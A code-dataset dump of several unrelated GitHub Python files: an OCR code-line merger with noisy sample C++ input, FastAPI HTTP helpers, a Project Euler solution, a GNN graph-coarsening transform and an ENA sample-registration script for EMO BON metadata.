email\n\n raise ValidationError('This email address is already in use.')\n \n '''","repo_name":"deepti5783/HelpRecruiter","sub_path":"base/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12980442488","text":"import re\r\n\r\ndef compare_start_space(str1, str2):\r\n n1 = 0\r\n n2 = 0\r\n for c in str1:\r\n if(c == ' '):\r\n n1 += 1\r\n else: break\r\n for c in str2:\r\n if(c == ' '):\r\n n2 += 1\r\n else: break\r\n\r\n return abs(n1-n2)\r\n\r\n\r\ndef compare_brackets_num(str1, str2):\r\n brackets = ['<','>','[',']','(',')','{','}']\r\n \r\n num_brackets1 = [0, 0, 0, 0, 0, 0, 0, 0]\r\n for c in str1:\r\n for (i,b) in enumerate(brackets):\r\n if(c == b):\r\n num_brackets1[i] += 1\r\n\r\n num_brackets2 = [0, 0, 0, 0, 0, 0, 0, 0]\r\n for c in str2:\r\n for (i,b) in enumerate(brackets):\r\n if(c == b):\r\n num_brackets2[i] += 1\r\n\r\n result = 0\r\n for (c1,c2) in zip(num_brackets1, num_brackets2):\r\n result += abs(c1-c2)\r\n\r\n return result\r\n\r\ndef compare_alphabets_num(str1, str2):\r\n alphabets = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\r\n \r\n num_alphabets1 = [0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0]\r\n for c in str1:\r\n for (i,b) in enumerate(alphabets):\r\n if(c == b):\r\n num_alphabets1[i] += 1\r\n\r\n num_alphabets2 = [0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0, 0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0]\r\n for c in str2:\r\n for (i,b) in enumerate(alphabets):\r\n if(c == b):\r\n num_alphabets2[i] += 1\r\n\r\n result = 0\r\n for (c1,c2) in zip(num_alphabets1, num_alphabets2):\r\n result += abs(c1-c2)\r\n return result\r\n\r\n\r\n\r\ndef get_substr(str1, str2):\r\n len_t = len(str1)\r\n len_c = len(str2)\r\n result = ''\r\n\r\n for i in range(len_t):\r\n for j in range(len_c):\r\n lcs_temp = 0\r\n match = ''\r\n\r\n while ((i + lcs_temp < len_t) and (j + lcs_temp < len_c) and (str1[i + lcs_temp] == str2[j + lcs_temp])):\r\n match += str2[j + lcs_temp]\r\n lcs_temp += 1\r\n if len(match) > len(result):\r\n result = match\r\n\r\n return result\r\n\r\n\r\ndef get_LCS(str1, str2):\r\n len1 = len(str1)\r\n len2 = len(str2)\r\n matrix = [[0] * (len2 + 1) for _ in range(len1 + 1)]\r\n result = ''\r\n\r\n for i in range(1, len1 + 1):\r\n for j in range(1, len2 + 1):\r\n if str1[i - 1] == str2[j - 1]:\r\n matrix[i][j] = matrix[i - 1][j - 1] + 1\r\n else:\r\n matrix[i][j] = max(matrix[i - 1][j], matrix[i][j - 1])\r\n\r\n i = len1\r\n j = len2\r\n while(i>0 and j>0):\r\n if str1[i - 1] == str2[j - 1]:\r\n result = str1[i - 1] + result\r\n i-=1\r\n j-=1\r\n elif matrix[i-1][j] > matrix[i][j-1]:\r\n i-=1\r\n else:\r\n j-=1\r\n\r\n return result\r\n\r\n\r\ndef get_difference_score(str1, str2):\r\n diff = 0\r\n diff += compare_start_space(str1, str2) * 2 #시작 공백 수\r\n diff += compare_brackets_num(str1, str2) * 2 #괄호 종류별 개수\r\n diff += compare_alphabets_num(str1, str2) #알파벳 종류별 개수\r\n\r\n str1 = ' '.join(str1.split()) #공백 여러개를 한개로 바꿈\r\n str2 = ' '.join(str2.split())\r\n diff += max(len(str1), len(str2)) - len(get_LCS(str1, str2)) \r\n\r\n #diff = diff/max(len(str1), len(str2)) * 10\r\n #가장 긴 common substring의 길이를 뺌\r\n\r\n return diff\r\n\r\n\r\n\r\ndef union_code(lines, txt):\r\n idx = 0\r\n for j in txt:\r\n found = False\r\n append = True\r\n for (i,line) in enumerate(lines):\r\n if(i >= idx):\r\n for l in line:\r\n diff = get_difference_score(j, l)\r\n if(diff < 10):\r\n if(diff < 5): \r\n append = False\r\n idx = i\r\n found = True\r\n #print(idx, j)\r\n if(found): break\r\n if(found and append): lines[idx].append(j)\r\n elif(found == False):\r\n idx += 1\r\n lines.insert(idx,[j])\r\n \r\n return lines\r\n\r\ndef get_startspace(str):\r\n num = 0\r\n for c in str:\r\n if(c == ' '): \r\n num += 1\r\n else: break\r\n return num\r\n\r\n\r\ndef get_reservednum(str):\r\n reserved = ['asm', 'double', 'new',\t'switch', 'auto', 'else', 'operator', 'template', \r\n 'break', 'enum', 'private', 'this', 'case', 'extern', 'protected', 'throw', 'catch', 'float', \r\n 'public', 'try', 'char', 'for', 'register', 'typedef', 'class', 'friend', 'return', 'union', \r\n 'const', 'goto', 'short', 'unsigned', 'continue', 'if', 'signed', 'virtual', 'default', \r\n 'inline', 'sizeof', 'void', 'delete', 'int', 'static', 'volatile', 'do', 'long', 'struct', 'while', \r\n '++', '--', '+=', '-=', '—=', '*=', '/=', '<=', '=>', '==', '!=']\r\n\r\n num = 0\r\n for w in reserved:\r\n if(w in str): num += 1 \r\n return num\r\n \r\n\r\n# check = ['@','#','//','£','|']\r\ndef correct_code(txt):\r\n reserved = 0\r\n for str in txt:\r\n reserved += get_reservednum(str)\r\n\r\n if(len(txt)>3 and reserved == 0): return []\r\n \r\n prev_startspace = get_startspace(txt[0])\r\n brackets = ['[',']','(',')','{','}']\r\n b_stack = []\r\n ret = []\r\n\r\n for str in txt:\r\n newstr = '' \r\n skipstr = ''\r\n append = True\r\n cur_startspace = get_startspace(str)\r\n\r\n brackets_like = ['|','I','l','1']\r\n nonblank_num = 0\r\n blank_num = 0\r\n change_brackets = -1\r\n\r\n skip = False\r\n for (idx,c) in enumerate(str):\r\n if(c != ' '): \r\n if(nonblank_num>0 and blank_num>15): \r\n skip = True\r\n blank_num = 0\r\n nonblank_num += 1\r\n else: \r\n blank_num += 1\r\n\r\n if((len(b_stack)==0 or b_stack[-1]!='(') and c ==';'):\r\n newstr += c\r\n skip = True\r\n\r\n if(not skip):\r\n if(c in brackets_like):\r\n change_brackets = c\r\n\r\n if(c in brackets):\r\n b_idx = brackets.index(c)\r\n if(b_idx%2 == 1): #close\r\n if(len(b_stack)!=0 and b_stack[-1] == brackets[b_idx-1]): #stack의 top이 open이라면 pop\r\n b_stack.pop()\r\n else: b_stack.append(c)\r\n elif(b_idx%2 == 0):\r\n b_stack.append(c)\r\n\r\n if(not skip): newstr+=c\r\n elif(c!=';' and c!=' '): skipstr+=c\r\n\r\n if(nonblank_num > 0):\r\n if(cur_startspace-prev_startspace > 8): #이전 줄과 시작이 9칸이상 차이나면 삭제\r\n print('remove', newstr,'*')\r\n append = False\r\n else:\r\n prev_startspace = cur_startspace\r\n\r\n if(nonblank_num == 1 and change_brackets != -1 and append):\r\n if(len(b_stack)==0): continue\r\n top = b_stack[-1]\r\n idx = brackets.index(top)\r\n \r\n if(idx%2 == 0): #open\r\n print(\"replace\",change_brackets, brackets[idx+1])\r\n newstr = newstr.replace(change_brackets, brackets[idx+1]) #stack의 top이 open이면 close로 바꿔줌\r\n b_stack.pop()\r\n \r\n if(append): ret.append(newstr)\r\n if(len(skipstr)!=0): print('skip', skipstr)\r\n\r\n return ret\r\n\r\n\r\n\r\ntxt0 = ''' #include \r\n #tinclude \r\n using namespace std; \r\n I \r\n int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=1; i < s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s.length(); \r\n for ( 53) { \r\n } \r\n 1 \r\n'''\r\ntxt0 = txt0.splitlines()\r\n#txt0 = correct_code(txt0)\r\n\r\n\r\nfor i in txt0:\r\n print(i)\r\n\r\ntxt1 = ''' using namespace std; \r\n int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=1; i <= s.length()/2: +i) { \r\n int pos = 0; I \r\n int len = s. length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n } \r\n } \r\n'''\r\ntxt1 = txt1.splitlines()\r\n#txt1 = correct_code(txt1)\r\n\r\nres = []\r\nfor i in txt0:\r\n temp = []\r\n temp.append(i)\r\n res.append(temp)\r\n\r\nfor i in res:\r\n print(i)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt1)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\n#print(get_difference_score(' for (int i=l; | <= s.length()/2; +i) { ', ' for (int i=l; | <= s.length()/2: +i) { '))\r\n\r\ntxt2 = ''' using namespace std; \r\n int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=1; i <= s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s.length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; \r\n if (pos >= s.length()) Break; \r\n } \r\n } \r\n'''\r\ntxt2 = txt2.splitlines()\r\n#txt2 = correct_code(txt2)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt2)\r\nfor i in answer:\r\n print(i)\r\n\r\ntxt3 = ''' int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=l; i <= s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s.length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); I \r\n pos += i; \r\n if (pos >= s.length()) break; \r\n int cnt = 0; \r\n for ( 5:) { \r\n'''\r\ntxt3 = txt3.splitlines()\r\n#txt3 = correct_code(txt3)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt3)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\n\r\ntxt4 = ''' IIL TG = Oslin g \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; \r\n if (pos >= s.length()) break; \r\n int cnt = 0; \r\n for ( 53) { \r\n if (unit.compare(s.substr(pos, i)) = 0) { \r\n tnt 5 \r\n pos += i; \r\n } else { \r\n'''\r\ntxt4 = txt4.splitlines()\r\n#txt4 = correct_code(txt4)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt4)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\ntxt5 = ''' for (int i=1; i <= s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s. length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; \r\n if (pos >= s.length()) break; \r\n I \r\n int cnt = 0; \r\n for ( 5;) { \r\n if (unit.compare(s.substr(pos, i)) = 0) { \r\n +cnt \r\n'''\r\ntxt5 = txt5.splitlines()\r\n#txt5 = correct_code(txt5)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt5)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\ntxt6 = ''' for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; I \r\n if (pos >= s.length()) break; \r\n int cnt = 0; \r\n for ( 53) { \r\n if (unit.compare(s.substr(pos, i)) = 0) { \r\n +cnt; \r\n pos += i; \r\n } else { \r\n break; \r\n } \r\n'''\r\ntxt6 = txt6.splitlines()\r\n#txt6 = correct_code(txt6)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt6)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\ntxt7 = ''' if (unit.compare(s.substr(pos, i)) = 0) { \r\n +cnt \r\n pos += i; \r\n } else { \r\n break; \r\n } \r\n } \r\n if (cnt > 0) { \r\n len —= i * cnt; 1 \r\n len += 1; \r\n } \r\n } \r\n } \r\n'''\r\ntxt7 = txt7.splitlines()\r\n#txt7 = correct_code(txt7)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt7)\r\nfor i in answer:\r\n print(i)\r\n\r\n","repo_name":"jstep750/VideoOcr","sub_path":"video-ocr/code_unionx.py","file_name":"code_unionx.py","file_ext":"py","file_size_in_byte":12384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5745111986","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Tuple\nfrom urllib import request\nfrom http import HTTPStatus\nfrom http.client import HTTPResponse\n\nimport aiohttp\nfrom fastapi import Request\nfrom pydantic import conint, validate_arguments\n\n\n@validate_arguments\ndef get_http_status(status_code: conint(ge=100, le=599)) -> Tuple[HTTPStatus, bool]:\n \"\"\"Get HTTP status code enum from integer value.\n\n Args:\n status_code (int, required): Status code for HTTP response: [100 <= status_code <= 599].\n\n Raises:\n ValueError: If status code is not in range [100 <= status_code <= 599].\n\n Returns:\n Tuple[HTTPStatus, bool]: Tuple of HTTP status code enum and boolean value if status code is known.\n \"\"\"\n\n _http_status: HTTPStatus\n _is_known_status = False\n try:\n _http_status = HTTPStatus(status_code)\n _is_known_status = True\n except ValueError:\n if (100 <= status_code) and (status_code < 200):\n status_code = 100\n elif (200 <= status_code) and (status_code < 300):\n status_code = 200\n elif (300 <= status_code) and (status_code < 400):\n status_code = 304\n elif (400 <= status_code) and (status_code < 500):\n status_code = 400\n elif (500 <= status_code) and (status_code < 600):\n status_code = 500\n else:\n raise ValueError(f\"Invalid HTTP status code: '{status_code}'!\")\n\n _http_status = HTTPStatus(status_code)\n\n return (_http_status, _is_known_status)\n\n\n@validate_arguments(config=dict(arbitrary_types_allowed=True))\ndef get_request_path(request: Request) -> str:\n \"\"\"Get request path with query params.\n\n Args:\n request (Request, required): Request object.\n\n Returns:\n str: Request path.\n \"\"\"\n\n _url_path = request.url.path\n if request.url.query:\n _url_path += \"?\" + request.url.query\n return _url_path\n\n\n@validate_arguments\nasync def async_is_connectable(\n url: str = \"https://www.google.com\", timeout: int = 3, check_status=False\n) -> bool:\n \"\"\"Check if the url is connectable.\n\n Args:\n url (str , optional): URL to check. Defaults to 'https://www.google.com'.\n timeout (int , optional): Timeout in seconds. Defaults to 3.\n check_status (bool, optional): Check HTTP status code (200). Defaults to False.\n\n Returns:\n bool: True if connectable, False otherwise.\n \"\"\"\n\n try:\n async with aiohttp.ClientSession() as _session:\n async with _session.get(url, timeout=timeout) as _response:\n if check_status:\n return _response.status == 200\n return True\n except:\n return False\n\n\n@validate_arguments\ndef is_connectable(\n url: str = \"https://www.google.com\", timeout: int = 3, check_status=False\n) -> bool:\n \"\"\"Check if the url is connectable.\n\n Args:\n url (str , optional): URL to check. Defaults to 'https://www.google.com'.\n timeout (int , optional): Timeout in seconds. Defaults to 3.\n check_status (bool, optional): Check HTTP status code (200). Defaults to False.\n\n Returns:\n bool: True if connectable, False otherwise.\n \"\"\"\n\n try:\n _response: HTTPResponse = request.urlopen(url, timeout=timeout)\n if check_status:\n return _response.getcode() == 200\n return True\n except:\n return False\n\n\n__all__ = [\n \"get_http_status\",\n \"get_request_path\",\n \"async_is_connectable\",\n \"is_connectable\",\n]\n","repo_name":"bybatkhuu/rest.fastapi-orm-template","sub_path":"app/src/core/utils/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4228126746","text":"from os import system\nfrom math import pow\nsystem('cls')\n\ndef is_pal(num):\n for idx in range(len(str(num))//2):\n if str(num)[-(idx + 1)] != str(num)[idx]: return False\n return True\n\nlarge_pal = 0\n\nfor i in range(999, 99, -1):\n for j in range(999, 99, -1):\n prod = i*j\n if(is_pal(prod) and (prod > large_pal)): large_pal = prod\nprint(large_pal)","repo_name":"derekboase/project_euler","sub_path":"python/pe4.py","file_name":"pe4.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71020991148","text":"import torch\nfrom typing import Tuple, List, Union, Optional\n\nfrom ..graph import Graph\nfrom .connect import connect_knn\n\n \ndef guillard_coarsening(edge_index: torch.Tensor,\n num_nodes: int) -> torch.Tensor:\n \"\"\"Modified version of the node-nested coarsening by Guillard (https://hal.science/inria-00074773/).\n It is used to create the low-resolution graphs of gMuS-GNNs and REMuS-GNNs.\n It assumes that the indegree of every node is the same.\n \n Args:\n edge_index (torch.Tensor): Edge index of the graph.\n num_nodes (int): Number of nodes of the graph.\n \n Returns:\n torch.Tensor: Coarse mask. It is a boolean tensor of size num_nodes. \n \"\"\"\n # Determine the indegree\n k = (edge_index[1]==0).sum().item()\n # Find senders\n senders = edge_index[0].view(-1,k)\n # Node-nested coarsening by Guillard\n coarse_mask = torch.ones(num_nodes, dtype=torch.bool)\n for coarse_node, s in zip(coarse_mask, senders):\n if coarse_node: coarse_mask[s] = False\n return coarse_mask\n \n\nclass GuillardCoarseningAndConnectKNN():\n r\"\"\" Transformation class that coarsens a graph using the node-nested coarsening by Guillard (https://hal.science/inria-00074773/).\n It is used to create the low-resolution graphs of gMuS-GNNs.\n It assumes that the indegree of every node is the same.\n It also connects the nodes of the graph using the k-nearest neighbours algorithm.\n\n Args:\n k (List[int]): Number of neighbours to connect at each level. The number of elements in the list determines the number of low-resolution graphs in the gMuS-GNN.\n At the i-th level, the number of neighbours is k[i-1].\n period (Optional[Union[None,Tuple]]): Period of the grid. If None, the grid is not periodic. If a tuple, it is the period of the grid.\n scale_edge_attr (Optional[Union[None, Tuple]]): Scale of the edge attributes. If None, the edge attributes are not scaled. If a tuple, it is the scale of the edge attributes.\n\n Methods:\n __call__(graph: Graph) -> Graph: Coarsens a graph using the node-nested coarsening by Guillard (https://hal.science/inria-00074773/).\n \"\"\"\n \n def __init__(self, \n k: List[int],\n period: Optional[Union[None,Tuple]] = None,\n scale_edge_attr: Optional[Union[None, Tuple]] = None):\n assert len(k) > 1 and len(k) < 5, \"The number of levels in gMuS-GNN must be between 2 and 4.\"\n self.k = k\n self.period = period\n self.scale_edge_attr = scale_edge_attr\n\n def __call__(self, graph: Graph) -> Graph:\n num_levels = len(self.k) # Number of levels in gMuS-GNN\n # Connect level 1\n graph.edge_index, graph.edge_attr = connect_knn(graph.pos, self.k[0], period=self.period)\n # Coarsen level 1\n graph.coarse_mask2 = guillard_coarsening(graph.edge_index, graph.num_nodes) # Mask applied to V^1 to obtain V^2\n coarse_index2 = graph.coarse_mask2.nonzero().squeeze() # V^1-index of the nodes in V^2\n # Connect level 2\n graph.edge_index2, graph.edge_attr2 = connect_knn(graph.pos[coarse_index2], self.k[1], period=self.period)\n if num_levels > 2:\n # Coarsen level 2\n graph.coarse_mask3 = torch.zeros_like(graph.coarse_mask2, dtype=torch.bool)\n graph.coarse_mask3[graph.coarse_mask2] = guillard_coarsening(graph.edge_index2, graph.coarse_mask2.sum()) # Mask applied to V^1 to obtain V^3\n coarse_index3 = graph.coarse_mask3.nonzero().squeeze() # V^1-index of the nodes in V^3\n # Connect level 3\n graph.edge_index3, graph.edge_attr3 = connect_knn(graph.pos[coarse_index3], self.k[2], period=self.period)\n if num_levels > 3:\n # Coarsen level 3\n graph.coarse_mask4 = torch.zeros_like(graph.coarse_mask3, dtype=torch.bool)\n graph.coarse_mask4[graph.coarse_mask3] = guillard_coarsening(graph.edge_index3, graph.coarse_mask3.sum()) # Mask applied to V^1 to obtain V^4\n coarse_index4 = graph.coarse_mask4.nonzero().squeeze() # V^1-index of the nodes in V^4\n # Connect level 4\n graph.edge_index4, graph.edge_attr4 = connect_knn(graph.pos[coarse_index4], self.k[3], period=self.period)\n # Renumber edge index to the original indices\n graph.edge_index2 = coarse_index2[graph.edge_index2]\n if num_levels > 2: graph.edge_index3 = coarse_index3[graph.edge_index3]\n if num_levels > 3: graph.edge_index4 = coarse_index4[graph.edge_index4]\n # Scale both edge_attr\n if self.scale_edge_attr[0] is not None: graph.edge_attr /= (2*self.scale_edge_attr[0])\n if self.scale_edge_attr[1] is not None: graph.edge_attr2 /= (2*self.scale_edge_attr[1])\n if num_levels > 2 and self.scale_edge_attr[2] is not None: graph.edge_attr3 /= (2*self.scale_edge_attr[2])\n if num_levels > 3 and self.scale_edge_attr[3] is not None: graph.edge_attr4 /= (2*self.scale_edge_attr[3])\n return graph","repo_name":"mario-linov/graphs4cfd","sub_path":"graphs4cfd/transforms/mugs.py","file_name":"mugs.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"20837908435","text":"import logging\nimport os\nimport pandas as pd\nimport requests\nimport time\nimport xml.etree.ElementTree as et\nimport yaml\nfrom collections import namedtuple\nfrom pathlib import Path\nfrom uritemplate import expand\nfrom urllib.error import HTTPError\n\nGITHUB_WORKSPACE = Path(os.getenv(\"GITHUB_WORKSPACE\", \"/github/workspace\"))\n\nEndpoint = namedtuple(\"Endpoint\", \"username password dropbox query env\")\n\nENDPOINT_PRO = Endpoint(\n os.getenv(\"USERNAME\"),\n os.getenv(\"PASSWORD\"),\n \"https://www.ebi.ac.uk/ena/submit/drop-box/submit/\",\n \"https://www.ebi.ac.uk/ena/portal/api/search?result=sample&query=(sample_alias={alias})\",\n \"PRO\"\n) \n\nENDPOINT_DEV = Endpoint(\n os.getenv(\"USERNAME\"),\n os.getenv(\"PASSWORD\"),\n \"https://wwwdev.ebi.ac.uk/ena/submit/drop-box/submit/\",\n \"https://wwwdev.ebi.ac.uk/ena/portal/api/search?result=sample&query=(sample_alias={alias})\",\n \"DEV\"\n) \n\nERC000021 = pd.read_csv(\"https://raw.githubusercontent.com/emo-bon/sequencing-profile/main/checklist-translations/ERC000021.csv\")\nERC000021 = ERC000021[ERC000021[\"include\"] == \"Y\"]\n\nERC000024 = pd.read_csv(\"https://raw.githubusercontent.com/emo-bon/sequencing-profile/main/checklist-translations/ERC000024.csv\")\nERC000024 = ERC000024[ERC000024[\"include\"] == \"Y\"]\n\n\ndef generate_ena_accession_numbers(smi, ref_code, df_run_info, endpoint):\n # TODO: replace github URLs with published rocrate urls in domain data.emobon.embrc.eu\n # TODO: when samples are triplized, get sample metadata from RDF graph rather than df/csv\n observatory = smi.split(\"_\")[1]\n habitat = {\"So\": \"sediment\", \"Wa\": \"water\"}[smi.split(\"_\")[2]]\n df_sequencing = df_run_info[df_run_info[\"source_material_id\"] == smi]\n assert len(df_sequencing) == 1\n\n df_measured = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/observatory-\"\n f\"{observatory.lower()}-crate/main/logsheets-transformed/{habitat}_measured.csv\",\n smi,\n \"source_mat_id\"\n )\n\n df_observatory = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/observatory-\"\n f\"{observatory.lower()}-crate/main/logsheets-transformed/{habitat}_observatory.csv\",\n smi\n )\n\n df_sampling = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/observatory-\"\n f\"{observatory.lower()}-crate/main/logsheets-transformed/{habitat}_sampling.csv\",\n smi,\n \"source_mat_id\"\n )\n\n df_governance = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/governance-data/main/observatories.csv\",\n observatory,\n \"EMOBON_observatory_id\"\n )\n\n if not (df_measured is None or df_observatory is None or df_sampling is None or df_governance is None):\n submission = get_submission_xml()\n sample = get_sample_xml(smi, ref_code, habitat, df_measured, df_observatory, df_sampling, df_sequencing)\n ean_sample, an_biosamples = get_ean_from_ebi(smi, ref_code, sample, submission, endpoint)\n ean_project = df_governance[\"ENA_accession_number_project\"].iloc[0]\n ean_umbrella = df_governance[\"ENA_accession_number_umbrella\"].iloc[0]\n return ean_sample, ean_project, ean_umbrella, an_biosamples\n\n\ndef retrieve_metadata(url, value, filter_column=None):\n try:\n df = pd.read_csv(url, dtype=object, keep_default_na=False)\n if filter_column:\n df = df[df[filter_column] == value]\n assert len(df) == 1\n return df\n except HTTPError as e:\n logger.error(f\"HTTPError | Could not retrieve metadata for {value} ({url}) | {e}\")\n except AssertionError as e:\n logger.error(f\"AssertionError | Metadata size is not equal to 1 row for {value} ({url}) | {e}\")\n\n\ndef get_submission_xml():\n submission = et.Element(\"SUBMISSION\")\n actions = et.SubElement(submission, \"ACTIONS\")\n action = et.SubElement(actions, \"ACTION\")\n et.SubElement(action, \"ADD\") # TODO UPDATE?\n return submission\n\n\ndef get_sample_xml(smi, ref_code, habitat, df_measured, df_observatory, df_sampling, df_sequencing):\n sample_set = et.Element(\"SAMPLE_SET\")\n sample = et.SubElement(sample_set, \"SAMPLE\")\n sample.attrib[\"alias\"] = ref_code\n title = et.SubElement(sample, \"TITLE\")\n title.text = smi\n sample_name = et.SubElement(sample, \"SAMPLE_NAME\")\n taxon_id = et.SubElement(sample_name, \"TAXON_ID\")\n taxon_id.text = str(df_sampling[\"tax_id\"].iloc[0].split(\"=\")[1])\n scientific_name = et.SubElement(sample_name, \"SCIENTIFIC_NAME\")\n scientific_name.text = df_sampling[\"scientific_name\"].iloc[0]\n sample_description = et.SubElement(sample, \"DESCRIPTION\")\n sample_description.text = df_sampling[\"samp_description\"].iloc[0]\n sample_attributes = et.SubElement(sample, \"SAMPLE_ATTRIBUTES\")\n\n if habitat == \"sediment\": # ERC000021\n add_attribute(sample_attributes, \"ENA-CHECKLIST\", \"ERC000021\")\n add_attribute(sample_attributes, \"elevation\", str(0), \"m\")\n df_checklist = ERC000021\n else: # ERC000024\n add_attribute(sample_attributes, \"ENA-CHECKLIST\", \"ERC000024\")\n df_checklist = ERC000024\n\n sheet2df = {\n \"measured\": df_measured,\n \"observatory\": df_observatory,\n \"sampling\": df_sampling,\n \"sequencing\": df_sequencing\n }\n\n for _, row in df_checklist.iterrows():\n tag = row[\"ENA_term\"]\n value = str(sheet2df[row[\"EMO_BON_sheet\"]][row[\"EMO_BON_term\"]].iloc[0])\n units = row[\"units\"]\n if pd.isna(units): units = None\n if tag == \"sequence quality check\": value = \"manual\" # TODO get this sorted out in QC\n if tag == \"tidal stage\" and value == \"ebb_tide\": value = \"low\" # TODO get this sorted out in QC\n if not value in (\"\", \"NA\", \"nan\"):\n add_attribute(sample_attributes, tag, value, units)\n\n return sample_set\n\n\ndef add_attribute(element, tag, value, units=None):\n sample_attribute = et.SubElement(element, \"SAMPLE_ATTRIBUTE\")\n t = et.SubElement(sample_attribute, \"TAG\")\n t.text = tag\n v = et.SubElement(sample_attribute, \"VALUE\")\n v.text = value\n if units:\n u = et.SubElement(sample_attribute, \"UNITS\")\n u.text = units\n\n\ndef get_ean_from_ebi(smi, ref_code, sample, submission, endpoint):\n time.sleep(0.1)\n files = {\n \"SAMPLE\": (\n \"sample.xml\",\n et.tostring(sample, xml_declaration=True, encoding=\"UTF-8\")\n ),\n \"SUBMISSION\": (\n \"submission.xml\",\n et.tostring(submission, xml_declaration=True, encoding=\"UTF-8\")\n ),\n }\n try:\n response = requests.post(\n endpoint.dropbox,\n auth=(endpoint.username, endpoint.password),\n files=files\n )\n assert response.headers[\"Content-Type\"] == \"application/xml\"\n except Exception as e:\n logger.error(f\"Exception | Unable to complete API request for {smi} ({ref_code}) | {e}\")\n return None, None\n root = et.fromstring(response.content.decode())\n et.dump(root)\n if root.attrib[\"success\"] == \"true\":\n sample_ean = root.find(\"SAMPLE\").attrib[\"accession\"]\n ext_id_ean = root.find(\"SAMPLE\").find(\"EXT_ID\").attrib[\"accession\"] # TODO if type=\"biosample\"\n return sample_ean, ext_id_ean\n else:\n try:\n url = expand(endpoint.query, alias=f'\"{ref_code}\"')\n df = pd.read_csv(url, sep='\\t')\n assert len(df) == 1\n return df[\"sample_accession\"].iloc[0], \"not found\"\n except Exception as e:\n logger.error(f\"Exception | Could not register or retrieve ENA accession number for {smi} ({ref_code}) | {e}\")\n return None, None\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(__name__)\n batches = [i for i in os.scandir(GITHUB_WORKSPACE / \"shipment\") if i.is_dir()]\n for batch in batches:\n properties_path = Path(batch.path) / f\"properties-{batch.name}.yml\"\n if properties_path.exists():\n properties = yaml.load(\n open(properties_path),\n Loader=yaml.CLoader\n )\n if properties[\"ready_for_processing\"] == True:\n if properties[\"production_deployment\"] == True:\n endpoint = ENDPOINT_PRO\n ena_csv_path = Path(batch.path) / f\"ena-accession-numbers-{batch.name}.csv\"\n else:\n endpoint = ENDPOINT_DEV\n ena_csv_path = Path(batch.path) / f\"ena-accession-numbers-{batch.name}.dev.csv\"\n df_run_info = pd.read_csv(Path(batch.path) / f\"run-information-{batch.name}.csv\")\n if ena_csv_path.exists():\n df_ena = pd.read_csv(ena_csv_path)\n else:\n df_ena = pd.DataFrame(\n columns=[\n \"source_material_id\",\n \"ref_code\",\n \"ref_code_seq\",\n \"ena_accession_number_sample\",\n \"ena_accession_number_project\",\n \"ena_accession_number_umbrella\",\n \"biosamples_accession_number\"\n ]\n )\n for _, row in df_run_info.iterrows():\n smi = row[\"source_material_id\"]\n ref_code = row[\"ref_code\"]\n ref_code_seq = row[\"ref_code_seq\"]\n if (not smi in df_ena[\"source_material_id\"].to_list()) and (\"BPNS\" in smi): # TODO: remove BPNS filter\n eans = generate_ena_accession_numbers(smi, ref_code, df_run_info, endpoint)\n if eans and all(eans): # eans is not None and none of the elements in eans is None \n df_ena = df_ena.append(\n {\n \"source_material_id\": smi,\n \"ref_code\": 